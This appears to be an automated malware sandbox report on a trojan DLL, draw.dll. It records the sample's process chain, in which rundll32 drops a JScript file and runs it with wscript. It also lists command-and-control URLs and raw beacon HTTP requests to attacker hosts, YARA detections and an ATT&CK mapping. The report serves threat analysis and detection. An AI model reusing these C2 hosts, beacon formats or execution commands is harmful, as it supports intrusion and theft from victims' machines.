Source: wscript.exe, 0000000C.00000002.769105699.0000000000841000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753900638.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769313214.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753950766.0000000000849000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769679607.00000000051D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msnbot-207-46-194-33.search.msn.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJ
Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://msnbot-207-46-194-33.search.msn.com5
Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.dr | String found in binary or memory: http://organicgreensfl.com
Source: wscript.exe, 0000000C.00000002.769378758.000000000089F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://organicgreensfl.com/
Source: wscript.exe, 0000000C.00000002.769056047.000000000082B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://organicgreensfl.com/he
Source: wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769499595.0000000004B31000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769524971.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=
Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=YWh7bXMzTUxaQl1GWSQ%2BOD9dPj44M
Source: wscript.exe, 0000000C.00000002.769679607.00000000051D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=b2Z1Y309Q0JUTFNIVyowNjFTMDA2PUN
Source: wscript.exe, 00000010.00000003.615182215.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.614982319.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769197728.00000000007CF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: wscript.exe, 0000000C.00000003.615132442.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.615659227.0000000000878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com2=classic&regclid=YGl6bHIyTE1bQ1xHWCU%2FOT5cPz85MkxNW0NcR1glPzk%2BXD8%2FOTJuaW
                    Source: unknownDNS traffic detected: queries for: msnbot-207-46-194-33.search.msn.com
                    Source: global trafficHTTP traffic detected: GET /rpc.aspx?winrm=2387&view2=classic&regclid=bGV2YH4%2BQEFXT1BLVCkzNTJQMzM1PkBBV09QS1QpMzUyUDMzNT5iZWh3YT42MmE3Yjc3Nj5pZWA2PT43Nj4wNz03&client=ixxppezciktqtwhxserbxnujcbfpqcn&service_id=FE04120&ubwG=tzuqeqskfsnk HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: knockoutlights.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJDVU1SSVYrMTcwUjExNzxgZ2p1Yzw0MGM1YDU1NDxrZ2I0Pzw1NDwyNT81&client=tarbneghyrdfwglztdpcknpjvzxbxtm&service_id=FE05211&ubwG=payxcvavvogx HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: knockoutlights.comConnection: Keep-Alive

                    System Summary

                    Source: 4.3.rundll32.exe.334a950.0.unpack, type: UNPACKEDPEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 0.3.loaddll32.exe.b0a950.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 4.3.rundll32.exe.334a950.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 3.3.rundll32.exe.119a950.0.unpack, type: UNPACKEDPEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 3.3.rundll32.exe.119a950.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 0.3.loaddll32.exe.b0a950.0.unpack, type: UNPACKEDPEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 00000003.00000003.535269013.0000000001190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: Process Memory Space: loaddll32.exe PID: 5220, type: MEMORYSTRMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: Process Memory Space: rundll32.exe PID: 6128, type: MEMORYSTRMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: Process Memory Space: wscript.exe PID: 3680, type: MEMORYSTRMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: Process Memory Space: wscript.exe PID: 4252, type: MEMORYSTRMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: C:\Users\Public\iVIwVADQD.eLxan, type: DROPPEDMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: draw.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                    Source: 4.3.rundll32.exe.334a950.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 0.3.loaddll32.exe.b0a950.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 4.3.rundll32.exe.334a950.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 3.3.rundll32.exe.119a950.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 3.3.rundll32.exe.119a950.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 0.3.loaddll32.exe.b0a950.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 00000003.00000003.535269013.0000000001190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: Process Memory Space: loaddll32.exe PID: 5220, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: Process Memory Space: rundll32.exe PID: 6128, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: Process Memory Space: wscript.exe PID: 3680, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: Process Memory Space: wscript.exe PID: 4252, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: C:\Users\Public\iVIwVADQD.eLxan, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: draw.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: draw.dllReversingLabs: Detection: 82%
                    Source: draw.dllVirustotal: Detection: 75%
                    Source: draw.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\draw.dll,Productword9
                    Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\draw.dll"
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\draw.dll,Productword9
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\draw.dll,Productword9
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\Public\iVIwVADQD.eLxan
Source: classification engineClassification label: mal100.troj.evad.winDLL@12/1@10/1
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: draw.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: kbdusm.pdb source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\Month\ago\written\Weight\Root\vowel\FatOrder.pdb source: draw.dll
                    Source: Binary string: Wkbdusm.pdb source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp
                    Source: draw.dllStatic PE information: real checksum: 0x59f56 should be: 0x4d8e1
                    Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04E9B9CD push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000
                    Source: wscript.exe, 0000000C.00000003.615132442.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWKD
                    Source: wscript.exe, 00000010.00000003.614982319.00000000007B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                    Source: wscript.exe, 0000000C.00000003.617698980.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753900638.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769313214.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.615015521.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.615322654.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: wscript.exe, 0000000C.00000003.615132442.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPb
                    Source: wscript.exe, 00000010.00000003.614982319.00000000007B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                    Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04E9F081 LdrInitializeThunk,

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: ec.atdmt.com
                    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 207.148.248.143 80
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: a-zcorner.com
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: msnbot-207-46-194-33.search.msn.com
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: knockoutlights.com
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: 4.3.rundll32.exe.334a950.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.b0a950.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.3.rundll32.exe.334a950.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.119a950.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.119a950.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.b0a950.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.535269013.0000000001190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.769445270.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.663643714.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.768676273.0000000000708000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.768788534.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3680, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4252, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\Public\iVIwVADQD.eLxan, type: DROPPED

                    Remote Access Functionality

                    Source: Yara matchFile source: 4.3.rundll32.exe.334a950.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.b0a950.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.3.rundll32.exe.334a950.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.119a950.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.119a950.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.b0a950.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.535269013.0000000001190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.769445270.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.663643714.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.768676273.0000000000708000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.768788534.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3680, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4252, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\Public\iVIwVADQD.eLxan, type: DROPPED
MITRE ATT&CK Matrix (one list per tactic column; a leading number is the report's badge for that technique, as it appears in the matrix)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Scripting; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: 111 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: 1 Masquerading; 1 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Scripting; 1 Obfuscated Files or Information; 1 Rundll32; 1 Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Remote System Discovery; 2 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
Behavior Graph (ID: 756451, Sample: draw.dll, Startdate: 30/11/2022, Architecture: WINDOWS, Score: 100)

• Start: organicgreensfl.com contacted; signatures at the root node: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 5 other signatures
• loaddll32.exe started; it in turn started cmd.exe, wscript.exe, rundll32.exe and conhost.exe
• cmd.exe started rundll32.exe
• wscript.exe (started by loaddll32.exe): knockoutlights.com 207.148.248.143, ports 49705, 49706, 80, BIZLAND-SDUS United States; a-zcorner.com; 2 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit)
• rundll32.exe (started by cmd.exe): dropped C:\Users\Public\iVIwVADQD.eLxan (ASCII); started wscript.exe
